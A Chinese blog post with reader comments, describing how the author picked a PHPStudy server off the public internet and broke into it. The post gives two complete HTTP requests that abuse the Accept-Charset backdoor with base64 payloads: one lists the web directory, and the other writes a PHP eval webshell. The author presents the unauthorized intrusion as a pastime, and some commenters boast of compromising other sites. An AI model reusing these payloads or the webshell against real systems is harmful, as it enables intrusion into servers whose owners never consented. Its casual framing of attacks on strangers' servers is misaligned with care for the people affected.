记一次PHPstudy漏洞挖掘过程

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试5111,9542字数 184阅读0分36秒阅读模式
AI智能摘要
当你以为PHPStudy环境安全无虞时,一个看似普通的phpinfo页面竟能成为入侵入口。本文将完整还原黑客如何利用编码参数漏洞,在目标服务器上实现目录遍历与Webshell植入的全过程。通过真实攻击案例演示,揭示老旧PHP版本中隐藏的致命风险,并附详细payload解析——这或许是你的服务器正在面临的隐形威胁。
— AI 生成的文章内容摘要

今天有点烦躁,所以得找点事刺激一下

于是,公网上搜了一个PHPstudy的站
记一次PHPstudy漏洞挖掘过程-图片1
测试payload看看有没有漏洞,果然、存在漏洞
记一次PHPstudy漏洞挖掘过程-图片1
看一下目录

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: close

记一次PHPstudy漏洞挖掘过程-图片2
写入webshell

GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close

记一次PHPstudy漏洞挖掘过程-图片3
再次查看一下目录,可以看到成功了
记一次PHPstudy漏洞挖掘过程-图片3
连接,OK,收工。。。
记一次PHPstudy漏洞挖掘过程-图片3

http://www.oniont.cn/index.php/archives/286.html

 
OnionT@KillBoy
  • it2021
  • it2021.com
  • PHP 安全
  • PHPstudy 漏洞
  • shell
  • Web 漏洞利用
  • 渗透测试笔记
评论  51  访客  51
    • 星河滚烫
      星河滚烫 0

      这payload看着有点眼熟,是那个Accept-Charset的漏洞吧?

        • 绿洲牧人
          绿洲牧人 0

          @ 星河滚烫 Payload确实是Accept-Charset注入,经典操作了。

          • FuyuNest
            FuyuNest 0

            @ 星河滚烫 没错,就是2016年那个Accept-Charset RCE,靠base64传命令的老套路。

          • 平衡天秤
            平衡天秤 0

            刚入坑的小白问下,这个漏洞影响phpstudy所有版本吗?🤔

              • 拖沓鬼
                拖沓鬼 1

                @ 平衡天秤 影响范围主要在老版本,新版默认配置改了,应该没这问题。

              • 心梦旅人
                心梦旅人 0

                之前帮朋友处理过类似情况,也是被传了shell,折腾半天才清理干净。

                • 深夜食堂
                  深夜食堂 1

                  这个漏洞好像需要特定配置才会触发?

                  • 暗黑魔王
                    暗黑魔王 0

                    代码里那个base64解码出来是执行dir命令吧,有点东西。

                      • 伏羲
                        伏羲 0

                        @ 暗黑魔王 dir命令执行那块base64解出来确实是列目录,后面写shell也顺理成章。

                      • 怀旧钟表匠
                        怀旧钟表匠 0

                        测试环境用phpstudy的确实不少,方便是方便但安全配置容易疏忽。

                        • 寂灭之誓
                          寂灭之誓 0

                          图片里是5.4.0版本,现在新版本还有这个问题不?

                            • 码农007
                              码农007 0

                              @ 寂灭之誓 新版本好像修了,但很多人懒得升级,照样中招。

                            • 浮萍漂泊
                              浮萍漂泊 0

                              666,步骤挺清晰的,适合跟着复现一下。

                              • 光禄勋
                                光禄勋 1

                                这种老漏洞实战中还能碰到,说明很多站运维真不上心啊。

                                  • 朱雀游侠
                                    朱雀游侠 0

                                    @ 光禄勋 很多小公司图省事直接把phpstudy丢服务器上跑,防火墙都不设。

                                  • 铁拳无敌
                                    铁拳无敌 0

                                    感觉过程描述可以再细点,比如怎么定位到那个站点的。

                                      • VanishingEcho
                                        VanishingEcho 1

                                        @ 铁拳无敌 定位站点是不是用的fofa或者shodan啊?求个具体方法。

                                      • Zero狐
                                        Zero狐 0

                                        这漏洞复现起来其实挺简单的,照着步骤走就行。

                                        • 月下独行者
                                          月下独行者 0

                                          Accept-Charset那个老洞了,没想到现在还有人中招。

                                            • 春樱絮语
                                              春樱絮语 1

                                              @ 月下独行者 这漏洞都多少年了,居然还有人没打补丁,服了。

                                            • 橡皮擦下的真相
                                              橡皮擦下的真相 0

                                              我上周刚扫到一个站也是这个漏洞,直接getshell了。

                                              • 安息使者
                                                安息使者 0

                                                新手问下,PHPstudy不是本地开发工具吗?怎么公网还能搜到?🤔

                                                • 幽魂歌者
                                                  幽魂歌者 0

                                                  老版本PHPstudy默认开远程访问,很多小白根本不知道关。

                                                    • 极光引路人
                                                      极光引路人 0

                                                      @ 幽魂歌者 默认开远程访问真的坑,我之前也栽过这上面。

                                                    • 混沌之眼
                                                      混沌之眼 0

                                                      5.4.0太老了,但架不住有人还在生产环境跑这个……无语。

                                                      • 至尊狂枭
                                                        至尊狂枭 1

                                                        这个漏洞要Apache模块加载了php才行吧?纯nginx应该没事?

                                                        • SpectralLull
                                                          SpectralLull 0

                                                          我之前也踩过这坑,本地调试完忘关远程访问,差点被挂马。

                                                          • 薰衣草
                                                            薰衣草 0

                                                            新手求问:payload里的base64解出来具体是啥命令啊?看不懂。

                                                            • 青崖客
                                                              青崖客 0

                                                              这操作看着简单,但没点基础连抓包都搞不定吧……

                                                              • 雨帘
                                                                雨帘 1

                                                                图片里Apache 2.4.39 + PHP 5.4.0,这组合现在还敢放公网?胆子真大。

                                                                • 水仙
                                                                  水仙 0

                                                                  感觉复现步骤跳得太快了,比如怎么确定目标用了phpstudy?

                                                                  • 仓鼠小小
                                                                    仓鼠小小 0

                                                                    又是这种“方便但危险”的工具,开发图快,运维背锅。

                                                                    • 射手星轨
                                                                      射手星轨 0

                                                                      shell写进WWW目录就完事了?那权限是不是得看Apache跑的用户啊?

                                                                        • 铜章铁卷
                                                                          铜章铁卷 0

                                                                          @ 射手星轨 工具方便是方便,但安全意识也得跟上啊。

                                                                        • 岁月留声机
                                                                          岁月留声机 0

                                                                          新手问下,现在用phpstudy还安全吗?有点慌🤔

                                                                          • 松果
                                                                            松果 1

                                                                            shell写进去之后能干啥?是不是直接删库跑路?

                                                                            • 晨曦物联
                                                                              晨曦物联 1

                                                                              这操作看着简单,其实得先找到目标站吧?咋找的啊?

                                                                              • wǎnqiū
                                                                                wǎnqiū 1

                                                                                payload那段base64是传的dir命令吧?

                                                                                • 星辰守望者
                                                                                  星辰守望者 1

                                                                                  前几天刚搞完这个,确实折腾了好久,权限问题卡半天。

                                                                                  • 雪域狼
                                                                                    雪域狼 1

                                                                                    又是老版本惹的祸,开发图快运维背锅实锤了。

                                                                                    • 落梅笛
                                                                                      落梅笛 1

                                                                                      base64那段解出来是写shell?感觉可以再讲细点。

                                                                                      • 永夜昙
                                                                                        永夜昙 0

                                                                                        本地工具放公网,这不是自己开门请黑客嘛……

                                                                                        • 社交休眠
                                                                                          社交休眠 0

                                                                                          这操作确实挺基础的,适合新手练手。

                                                                                          • 开心的风
                                                                                            开心的风 0

                                                                                            老洞了,现在新版本应该修复了吧。

                                                                                            • 星陨傀儡
                                                                                              星陨傀儡 0

                                                                                              base64那段解密后是echo system(“dir D:phpStudyWWW “);吧?

                                                                                              • 夜幕裁决者
                                                                                                夜幕裁决者 1

                                                                                                这种洞实战里还挺常见的,运维不更新真的坑。

                                                                                                • 砚边听雨
                                                                                                  砚边听雨 0

                                                                                                  之前也遇到类似情况,修复起来挺麻烦的。

                                                                                                  • Red红莲
                                                                                                    Red红莲 1

                                                                                                    payload构造得挺巧妙啊。

                                                                                                      • SavageMind
                                                                                                        SavageMind 1

                                                                                                        @ Red红莲 构造得蛮巧妙的

                                                                                                      • 樱月
                                                                                                        樱月 0

                                                                                                        怎么确定目标站用了phpstudy呢?能细说下吗?

                                                                                                        • 火星人
                                                                                                          火星人 0

                                                                                                          权限问题确实关键,不然shell也动不了啥。

                                                                                                        匿名

                                                                                                        发表评论

                                                                                                        匿名网友

                                                                                                        拖动滑块以完成验证